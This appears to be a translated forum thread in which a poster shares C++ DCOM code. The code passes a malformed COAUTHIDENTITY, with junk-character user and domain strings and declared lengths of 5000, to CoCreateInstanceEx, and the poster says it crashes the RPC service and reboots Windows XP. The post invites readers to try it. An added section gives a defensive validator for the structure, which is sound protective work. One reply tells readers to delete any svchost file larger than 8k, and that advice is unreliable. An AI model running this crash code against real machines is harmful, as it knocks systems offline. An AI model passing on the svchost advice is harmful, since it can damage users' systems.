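Description:
A few days ago, while debugging a program, I found that the machine reported an RPC service error and rebooted one minute later. I thought I had caught the Blaster worm again (the patch was already installed on XP Pro), but Norton found nothing. Later I discovered that the program I was debugging was the cause. The principle is the same as the Blaster worm: requesting the RPC service and writing a string of illegal characters produces the behaviour described above.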
#include "stdafx.h"
#include <objbase.h>
#include "Test5.h"
const IID IID_IComponent1 = {0x4CB86F19,0xBF1D,0x4971,{0x86,0x89,0x0C,0x70,0xC2,0xB9,0xA1,0xB0}};
const CLSID CLSID_Component1 = {0x8A5488AA,0x5F94,0x4153,{0x87,0x57,0xA9,0x8F,0x65,0xB1,0xDD,0x09}};
int main(int argc, char* argv[])
{
    MULTI_QI qi;
    qi.pIID = &IID_IComponent1;
    qi.hr = NULL;
    qi.pItf = NULL;
    COAUTHIDENTITY authidentity;
    authidentity.User = L"mike/////////987()*^&@!&%#&^!B(*^#@(*^@C@TD CQ309878&^(*&^";
    authidentity.UserLength = 5000;
    authidentity.Domain = L"HOMEMI^&$#@&^$(*@^#@*OYE*@YO*@!&^$#KE-PRO";
    authidentity.DomainLength = 5000;
    authidentity.Password = L"";
    authidentity.PasswordLength = 0;
    // The last member of COAUTHIDENTITY is left unset: authidentity.Flags = SEC_WINNT_AUTH_IDENTITY_UNICODE;
    COAUTHINFO authinfo = {-1,
                           0,
                           0,
                           0,
                           0,
                           &authidentity, NULL};
    COSERVERINFO servInf;
    servInf.dwReserved1 = NULL;
    servInf.dwReserved2 = NULL;
    servInf.pAuthInfo = &authinfo;
    servInf.pwszName = L"127.0.0.1";
    IComponent1 *pIComponent1 = NULL;
    CoInitializeEx(NULL, COINIT_APARTMENTTHREADED);
    HRESULT hr = NULL;
    hr = CoCreateInstanceEx(CLSID_Component1, NULL, CLSCTX_REMOTE_SERVER, &servInf, 1, &qi);
    if (pIComponent1) pIComponent1->Release();
    CoUninitialize();
    return 0;
}
Strangely, it only works on XP and has no effect on 2000. Everyone can give it a try.
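A caller-side consistency check for the identity structure in the post above, as an added example that is not part of the original post: it rejects declared lengths that do not match the actual strings (the post declares 5000 for much shorter strings) and an unset Flags member. The AuthIdentity struct, the 256-character cap, the result codes and the function names are assumptions made for this example; the real type is COAUTHIDENTITY from objbase.h.

```c
#include <stddef.h>
#include <stdio.h>
#include <wchar.h>

/* Portable stand-in for the COAUTHIDENTITY members used in the post
   (assumption: lets the check build without the Windows headers). */
typedef struct {
    const wchar_t *User;     unsigned long UserLength;
    const wchar_t *Domain;   unsigned long DomainLength;
    const wchar_t *Password; unsigned long PasswordLength;
    unsigned long Flags;
} AuthIdentity;

#define AUTH_IDENTITY_UNICODE 0x2UL  /* value of SEC_WINNT_AUTH_IDENTITY_UNICODE */
#define MAX_FIELD_CHARS       256UL  /* assumed cap for this example */

enum { ID_OK = 0, ID_BAD_FLAGS, ID_BAD_USER, ID_BAD_DOMAIN, ID_BAD_PASSWORD };

/* A field is consistent when its declared length equals the real string length
   (terminator excluded) and is within the cap. A NULL string needs length 0. */
static int field_ok(const wchar_t *s, unsigned long declared)
{
    size_t n = 0;
    if (s == NULL) return declared == 0;
    if (declared > MAX_FIELD_CHARS) return 0;
    while (n <= MAX_FIELD_CHARS && s[n] != L'\0') n++;   /* bounded scan */
    return n == declared;
}

/* Returns ID_OK only if the identity is safe to hand to the COM call. */
int validate_auth_identity(const AuthIdentity *id)
{
    if (id == NULL) return ID_OK;   /* no explicit identity, nothing to check */
    if (id->Flags != AUTH_IDENTITY_UNICODE) return ID_BAD_FLAGS;
    if (!field_ok(id->User, id->UserLength)) return ID_BAD_USER;
    if (!field_ok(id->Domain, id->DomainLength)) return ID_BAD_DOMAIN;
    if (!field_ok(id->Password, id->PasswordLength)) return ID_BAD_PASSWORD;
    return ID_OK;
}

int main(void)
{
    /* Constructed sample with the same shape as the post: short strings, length 5000, Flags unset. */
    AuthIdentity posted = { L"mike", 5000, L"HOME", 5000, L"", 0, 0 };
    printf("as posted: %d\n", validate_auth_identity(&posted));
    posted.Flags = AUTH_IDENTITY_UNICODE; posted.UserLength = 4; posted.DomainLength = 4;
    printf("corrected: %d\n", validate_auth_identity(&posted));
    return 0;
}
```
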
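Solution 1:
Look for svchost; if there are two, delete the one that is larger than 8k.
Solution 2: Heh, UP!
Solution 3: up
Solution 4: Impressive!
Solution 5: UP
Solution 6: Looking into it
Solution 7: mark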